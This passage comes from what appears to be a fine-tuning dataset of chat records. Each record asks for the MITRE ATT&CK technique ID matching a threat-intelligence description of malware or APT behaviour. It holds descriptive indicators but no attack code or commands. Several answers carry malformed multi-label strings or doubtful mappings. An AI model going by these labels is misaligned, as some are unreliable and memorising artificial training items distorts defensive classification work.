Cryptography" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "StrongPity can use HTTP and HTTPS in C2 communications." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Saint Bot has conducted system locale checks to see if the compromised host is in Russia, Ukraine, Belarus, Armenia, Kazakhstan, or Moldova." }, { "role": "assistant", "content": "T1614 - System Location Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Once APT28 gained access to the DCCC network, the group then proceeded to use that access to compromise the DNC network." }, { "role": "assistant", "content": "T1199 - Trusted Relationship" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Figure 3: no detections for SpeakUp in Virus Total In an attempt to endure the investigation process by security researchers, the second stage payload was encoded with salted base64" }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Fox Kitten has created a local user account with administrator privileges." }, { "role": "assistant", "content": "T1136.001 - Create Account: Local Account" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Kimsuky is a highly motivated threat actor targeting a number of entities in South Korea. This group has been relentlessly creating new infection chains to deliver different types of malware to their victims. This campaign relies on the abuse of Blogspot to host attacker-operated blogs serving malicious VB based scripts to their targets. We've found preliminary malicious components from initial access beacons to file exfiltrators being deployed to victims. In many cases, the content of these preliminary components was combined to serve special scripts to victims.The final implants utilized by the actors in this campaign are derivatives of the Gold Dragon/Brave Prince malware families. Such targeted attacks can result in the leak of restricted research, unauthorized access for espionage and even destructive attacks against target organizations" }, { "role": "assistant", "content": "T1608.001 - Upload Malware" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Empire can find shared drives on the local system." }, { "role": "assistant", "content": "T1135 - Network Share Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "AADInternals can gather unsecured credentials for Azure AD services, such as Azure AD Connect, from a local machine." }, { "role": "assistant", "content": "T1552.001 - Unsecured Credentials: Credentials In Files" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "OLDBAIT installs itself in \"%ALLUSERPROFILE%\\\\Application Data\\Microsoft\\MediaPlayer\\updatewindws.exe\"; the directory name is missing a space and the file name is missing the letter \"o.\"" }, { "role": "assistant", "content": "T1036.005 - Masquerading: Match Legitimate Name or Location" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TinyZBot contains screen capture functionality." }, { "role": "assistant", "content": "T1113 - Screen Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Empire can use Dropbox for data exfiltration." }, { "role": "assistant", "content": "T1567.002 - Exfiltration Over Web Service: Exfiltration to Cloud Storage" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SUNSPOT encrypted log entries it collected with the stream cipher RC4 using a hard-coded key. It also uses AES128-CBC encrypted blobs for SUNBURST source code and data extracted from the SolarWinds Orion > \"C:\\windows\\TEMP\\[RANDOM].tmp\"." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BADNEWS identifies files with certain extensions from USB devices, then copies them to a predefined directory." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "AveMaria is a new botnet, whose first version we found in September 2018, right after the arrests of the FIN7 members. We have medium confidence that this botnet falls under the FIN7 umbrella. In fact, AveMaria is a classic infostealer bot that collects all possible credentials from various types of software: browsers, email clients, messengers, etc., and can act as a keylogger. Since the beginning of 2019, we have collected more than 1300 samples and extracted more than 130 C2s." }, { "role": "assistant", "content": "T1114 - Email Collection', 'T1587.001 - Malware" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SoreFang can collect the hostname, operating system configuration, product ID, and disk space on victim machines by executing Systeminfo." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Cobalt Strike can recover hashed passwords." }, { "role": "assistant", "content": "T1003.002 - OS Credential Dumping: Security Account Manager" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Flagpro can execute malicious VBA macros embedded in .xlsm files." }, { "role": "assistant", "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "compressed data with zlib prior to sending it over C2." }, { "role": "assistant", "content": "T1560 - Archive Collected Data" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BackConfig can leverage API functions such as \"ShellExecuteA\" and \"HttpOpenRequestA\" in the process of downloading and executing files." }, { "role": "assistant", "content": "T1106 - Native API" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Keydnap uses a resource fork to present a macOS JPEG or text file icon rather than the executable's icon assigned by the operating system." }, { "role": "assistant", "content": "T1564.009 - Resource Forking" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "infected victims using JavaScript code." }, { "role": "assistant", "content": "T1064 - Scripting" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The encrypted message is then Base64 encoded, replacing all the ‘/’ and ‘+’ characters with the ‘.’ and ‘-’ characters, respectively" }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information', 'T1132 - Data Encoding" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "If cannot access shares using current privileges, it attempts access using hard coded, domain-specific credentials gathered earlier in the intrusion." }, { "role": "assistant", "content": "T1078 - Valid Accounts" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The initial beacon packet for contains the operating system version of the victim." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "NETEAGLE will decrypt resources it downloads with HTTP requests by using RC4 with the key \"ScoutEagle.\"" }, { "role": "assistant", "content": "T1573.001 - Symmetric Cryptography" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ZIRCONIUM has used a tool to enumerate proxy settings in the target environment." }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Okrum loader only executes the payload after the left mouse button has been pressed at least three times, in order to avoid being executed within virtualized or emulated environments." }, { "role": "assistant", "content": "T1497.002 - User Activity Based Checks" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Anchor has come with a packed payload." }, { "role": "assistant", "content": "T1027.002 - Obfuscated Files or Information: Software Packing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has performed C2 using DNS via A, OPT, and TXT records." }, { "role": "assistant", "content": "T1071 - Application Layer Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Caterpillar WebShell has a command to modify a Registry key." }, { "role": "assistant", "content": "T1112 - Modify Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Pupy has a built-in module for port scanning." }, { "role": "assistant", "content": "T1046 - Network Service Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Attor's dispatcher can establish persistence by registering a new service." }, { "role": "assistant", "content": "T1543.003 - Create or Modify System Process: Windows Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Blue Mockingbird has used wmic.exe to set environment variables." }, { "role": "assistant", "content": "T1047 - Windows Management Instrumentation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FELIXROOT collects information about the network including the IP address and DHCP server." }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "HotCroissant has used the open source UPX executable packer." }, { "role": "assistant", "content": "T1027.002 - Obfuscated Files or Information: Software Packing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Stuxnet uses an RPC server that contains a routine for file deletion and also removes itself from the system through a DLL export by deleting specific files." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FIN4 has used HTTP POST requests to transmit data." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "LockBit 2.0 is known for its extortion tactics, encrypting devices and demanding a ransom." }, { "role": "assistant", "content": "T1486 - Data Encrypted for Impact" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can execute commands on the victim's machine." }, { "role": "assistant", "content": "T1059 - Command and Scripting Interpreter" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The White Company has performed anti-analysis checks to determine if its malware was in a debugging environment." }, { "role": "assistant", "content": "T1497 - Virtualization/Sandbox Evasion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT29 has accessed victims’ internal knowledge repositories (wikis) to view sensitive corporate information on products, services, and internal business operations." }, { "role": "assistant", "content": "T1213 - Data from Information Repositories" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has used COM hijacking to establish persistence by hijacking a class named MMDeviceEnumerator and also by registering the payload as a Shell Icon Overlay handler COM object ({3543619C-D563-43f7-95EA-4DA7E1CC396A})." }, { "role": "assistant", "content": "T1546.015 - Event Triggered Execution: Component Object Model Hijacking" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SCT File Analysis The code of the Defender.sct file is an obfuscated JavaScript" }, { "role": "assistant", "content": "T1064 - Scripting', 'T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Gelsemium can retrieve data from specific Windows directories, as well as open random files as part of Virtualization/Sandbox Evasion." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "discovers shares on the network" }, { "role": "assistant", "content": "T1135 - Network Share Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Grandoreiro can bypass UAC by registering as the default handler for .MSC files." }, { "role": "assistant", "content": "T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "leveraged an open-source tool called SoftPerfect Network Scanner to perform network scanning." }, { "role": "assistant", "content": "T1046 - Network Service Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Cuba can query service status using \"QueryServiceStatusEx\" function." }, { "role": "assistant", "content": "T1007 - System Service Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Enumerates running processes for “Wireshark” and “Sysinternals”" }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Each web shell instance is configured to contain SP, Key, and Log variables. When the malicious ISAPI filter captures a username matching this variable, it knows to handle the incoming HTTP request as a command to the web shell. The DES key to encrypt the credentials in the configuration observed by CTU researchers is 12345678, and the log file is c:\\log.txt. The decrypted contents of the log file adhere to the format in Figure 22" }, { "role": "assistant", "content": "T1560.003 - Archive via Custom Method" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Most of CARBANAK’s strings are encrypted in order to make analysis more difficult. We have observed that the key and the cipher texts for all the encrypted strings are changed for each sample that we have encountered, even amongst samples with the same compile time. The RC2 key used for the HTTP protocol has also been observed to change among samples with the same compile time. These observations paired with the use of campaign codes that must be configured denote the likely existence of a build tool" }, { "role": "assistant", "content": "T1573.001 - Symmetric Cryptography" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Taidoor has the ability to modify the Registry on compromised hosts using \"RegDeleteValueA\" and \"RegCreateKeyExA\"." }, { "role": "assistant", "content": "T1112 - Modify Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Maze has checked the language of the machine with function \"GetUserDefaultUILanguage\" and terminated execution if the language matches with an entry in the predefined list." }, { "role": "assistant", "content": "T1614.001 - System Location Discovery: System Language Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "gathers the victim’s IP address via the ipconfig -all command." }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "This appears to be an implementation of hashbusting — a method of obfuscation in which a malware sample is subtly changed on the fly so each sample has a different checksum. As a result, the SHA256 hash of each payload downloaded from the sites in question appeared to be unique. However, the SSDEEP fuzzy hash of this sample was as follows" }, { "role": "assistant", "content": "T1027.005 - Indicator Removal from Tools" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BlackEnergy communicates with its C2 server over HTTP." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Pysa can perform network reconnaissance using the Advanced Port Scanner tool." }, { "role": "assistant", "content": "T1046 - Network Service Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "communicates over ports 80, 443, 53, and 8080 via raw sockets instead of the protocols usually associated with the ports." }, { "role": "assistant", "content": "T1043 - Commonly Used Port" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Wingbird side loads a malicious file, sspisrv.dll, in part of a spoofed lssas.exe service." }, { "role": "assistant", "content": "T1574.002 - Hijack Execution Flow: DLL Side-Loading" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Remote templates are a feature of Microsoft Word which allow a document to load a template to be used in a document – this template can be externally hosted, either on a file share, or on the internet. The template is then loaded when the document is opened. The Inception attackers use this feature in a malicious context as shown in Figure 1 below" }, { "role": "assistant", "content": "T1221 - Template Injection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Whitefly has encrypted the payload used for C2." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Internal web servers are often not configured with the same security controls as public-facing counterparts, making them more vulnerable to exploitation by APT40 and similarly sophisticated groups" }, { "role": "assistant", "content": "T1505.003 - Server Software Component: Web Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TEMP.Veles has used a VPN to persist in the victim environment." }, { "role": "assistant", "content": "T1133 - External Remote Services" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Meteor has the ability to discover the hostname of a compromised host." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "WannaCry enumerates current remote desktop sessions and tries to execute the malware on each session." }, { "role": "assistant", "content": "T1563.002 - Remote Service Session Hijacking: RDP Hijacking" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "downloads additional files that are base64-encoded and encrypted with another cipher." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The malware will ultimately be extracted to the %LocalAppData%\\Packages\\PXT folder, which includes the PHP.exe local interpreter, various scripts used to steal information, and supporting tools, as shown below." }, { "role": "assistant", "content": "T1059 - Command and Scripting Interpreter', 'T1588.001 - Malware" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "CHOPSTICK provides access to the Windows Registry, which can be used to gather information." }, { "role": "assistant", "content": "T1012 - Query Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "For Operation Honeybee, at least one identified persona was used to register for a free account for a control server." }, { "role": "assistant", "content": "T1583.004 - Server" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Upon first execution of TONEDEAF, FireEye identified a callback to the C2 server offlineearthquake[.]com over port 80." }, { "role": "assistant", "content": "T1571 - Non-Standard Port', 'T1043 - Commonly Used Port" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Squirrelwaffle has downloaded and executed additional encoded payloads." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Diavol can attempt to stop security software." }, { "role": "assistant", "content": "T1562.001 - Impair Defenses: Disable or Modify Tools" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TeamTNT has also been spotted using a malicious Docker image which can be found on Docker Hub to infect its victims’ servers" }, { "role": "assistant", "content": "T1610 - Deploy a container', 'T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Waterbear has the ability to decrypt its RC4 encrypted payload for execution." }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "QUADAGENT gathers the current domain the victim system belongs to." }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "persists via a login item." }, { "role": "assistant", "content": "T1547.015 - Boot or Logon Autostart Execution: Login Items" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Figure 3: The first step of decryption will perform XOR on one byte using the previous adjacent byte, starting from the last byte and excluding the first byte" }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "MimiPenguin can dump process memory and extract clear-text credentials." }, { "role": "assistant", "content": "T1003.007 - OS Credential Dumping: Proc Filesystem" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "QakBot can identify whether it has been run previously on a host by checking for a specified folder." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Once the user enters the targeted website, the attacker is notified and can take over the device remotely. As the victim accesses their online banking account, the attacker can display full-screen overlay images (hence the name “remote overlay”) designed to appear like they are part of the bank’s website. These pages can either block the victim’s access to the site, allowing the attacker to move money after initial authentication, or include additional data fields that the user is prompted to fill out" }, { "role": "assistant", "content": "T1185 - Browser Session Hijacking" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "njRAT has used a fast flux DNS for C2 IP resolution." }, { "role": "assistant", "content": "T1568.001 - Fast Flux DNS" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "A payload deletes Resiliency Registry keys created by Microsoft Office applications in an apparent effort to trick users into thinking there were no issues during application runs." }, { "role": "assistant", "content": "T1112 - Modify Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT29 has exfiltrated collected data over a simple HTTPS request to a password-protected archive staged on a victim's OWA servers." }, { "role": "assistant", "content": "T1048.002 - Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TeamTNT has used batch scripts to download tools and executing cryptocurrency miners." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "JSS Loader has the ability to launch scheduled tasks to establish persistence." }, { "role": "assistant", "content": "T1053.005 - Scheduled Task/Job: Scheduled Task" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Kobalos is triggered by an incoming TCP connection to a legitimate service from a specific source port." }, { "role": "assistant", "content": "T1205 - Traffic Signaling" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Our analysis of the backdoors used in the September 2018 attacks show that AuditCred.dll/ROptimizer.dll was similarly used:   FileTokenBroker.dll  (2017 attack) AuditCred.dll/Roptimizer.dll  (2018 attack) Launch Method Service Service Function Loader Component Loader Component Working directory %Windows%\\System32 %Windows%\\System32 Loaded Component Path %Windows%\\System32\\en-US %Program Files%\\Common Files\\System\\ado Loaded 